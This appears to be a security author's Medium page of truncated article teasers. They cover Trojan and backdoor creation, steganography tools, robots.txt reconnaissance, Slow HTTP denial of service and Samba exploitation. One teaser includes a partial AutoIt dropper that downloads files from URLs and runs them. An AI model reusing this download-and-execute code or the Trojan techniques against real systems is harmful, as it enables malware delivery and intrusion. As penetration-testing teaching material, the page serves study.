In our previous articles, we showed you how to create windows backdoors with “.bat” extensions.

In this tutorial, we will show you how to change “.bat” files to “.exe” and combine it with a PDF file to make a PDF Trojan document that can get us a reverse shell.

First, we need to download software called “Bat To Exe Converter” and install it on our computer.


In this instructional tutorial, we want to show you how to backdoor an image file and create a Trojan out of it. This method can be implied to any file type; pdf, txt, doc, excel, exe, and so on. Without further ado, let’s get started.

Open up any file editor and copy/paste the simple code written below.

#include <StaticConstants.au3>#include <WindowsConstants.au3>Local $urls = “url1,url2”Local $urlsArray = StringSplit($urls, “,”, 2 )For $url In $urlsArray$sFile = _DownloadFile($url)shellExecute($sFile)NExtFunc _DownloadFile($sURL)Local $hDownload, $sFile$sFile = StringRegExpReplace($sURL, “^.*/”, ““)$sDirectory = @TempDir & $sFile$hDownload = InetGet($sURL, $sDirectory…

By Sandro Villinger

S-Tools is a program composed by Andy Brown. It is maybe the most broadly perceived steganography instrument accessible today. You can use BMP, GIF, and WAV file types to cover documents that hide the secret data. The simplicity of the tool lets you drag and drop files easily. S-Tools will conceal the secret message inside the cover file through random accessible bits. These available bits are resolved using a pseudorandom number generator. This nonlinear addition makes the presence and extraction of secret messages increasingly troublesome.

As we mentioned before, using this tool is very easy, drag and drop the cover…


QuickStego is a lightweight encryption tool designed specifically to conceal a message in pictures with the goal that only other users of QuickStego can recover and read the hidden secret words. When content is covered up in an image the saved picture is still a “picture,” it will stack simply like some other image file and show up as it did previously. The image file can be saved, emailed, uploaded to the web, as before, the main contrast will be that it contains concealed content.

You can download this tool from the” webpage.

By Photoshop Roadmap

OpenStego is a steganography application that gives two functionalities: first, “Data Hiding,” which can conceal any information inside a cover document, and second, “Watermarking” which watermarks documents with an undetectable mark. It tends to be utilized to distinguish unapproved file replicating.

To download the tool, visit the page.


WxHexEditor is a free hex editor tool for Linux, Windows, and MacOSX. WxHexEditor isn’t an ordinary hex editor, yet could fill in as a low-level disk editor as well. In any case that you have issues with your hard drive or segment, you can recoup your information from them by altering parts in raw hex. You can change your segment tables, or you can recover records from the File System by hand with the assistance of WxHexEdit. This tool is also useful for hiding secret messages in the null hex bytes of the image files. …


The “robots.txt” file is utilized to offer guidelines to web robots, for example, web index crawlers, about areas inside the website that robots are permitted, or not permitted, to crawl and list. The presence of this file doesn’t in itself present any security vulnerability. In any case, it is regularly used to recognize confined or private areas of a website’s contents. The data in the file may, in this manner, help an aggressor to outline the site’s contents, mainly if a portion of the areas recognized are not linked from somewhere else on the website. If the application depends on…


Slow HTTP assaults are denial-of-service assaults in which the assailant sends HTTP requests in pieces gradually, to a web server. If an HTTP request isn’t finished, or if the transfer rate is low, the server keeps its assets occupied by sitting tight for the remainder of the information. At the point when the server’s simultaneous connection pool arrives at its maximum, it will create a denial-of-service. Slow HTTP assaults are anything but difficult to execute because they require just insignificant assets from the attacker.

To perform this attack, select the “Denial-of-Service (Slow HTTP DOS)” option and click on the “Hack”


Samba is an Open Source suite that gives consistent record and print services to SMB/CIFS customers. Remote misuse of input validation vulnerability in Samba enables assailants to get to documents and registries outside of the predefined share path. Effective exploitation allows remote assailants to sidestep the predetermined share restrictions to pick up read, write, and list access to records and catalogs under the privileges of the client. In circumstances where a public share is accessible, the assault can be performed by unauthenticated attackers.

In this instructional tutorial, we will show you how to compromise devices that run vulnerable Samba services.

Although Trojan Horses aren’t as popular on Mac OS as they are on Windows, that doesn’t mean Mac users aren’t vulnerable to these types of attacks.

Image: Getty

In the computer world, a Trojan Horse is a potentially dangerous form of malware that masquerades as something useful in order to be installed or downloaded into a computer device. If the Trojan software is installed, it begins to carry out its true intent, which is to carry out malicious activities that jeopardize the system’s overall security. …

David Artykov

Cybersecurity Professional, Penetration Testing Engineer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store